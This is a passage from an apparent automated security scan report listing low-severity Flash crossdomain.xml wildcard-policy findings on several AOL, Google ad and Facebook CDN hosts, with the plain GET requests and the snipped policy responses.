6.22. http://js.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Sat, 26 Mar 2011 21:06:16 GMT
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.23. http://music.aol.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:21 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.24. http://my.screenname.aol.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:19 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 23:57:10 GMT
ETag: "3f1-49eb66b672180"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=440
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...

6.25. http://o.aolcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=683105
Expires: Sun, 03 Apr 2011 18:21:22 GMT
Date: Sat, 26 Mar 2011 20:36:17 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...

6.26. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 25 Mar 2011 11:49:02 GMT
Expires: Sat, 26 Mar 2011 11:49:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26769
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.27. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain m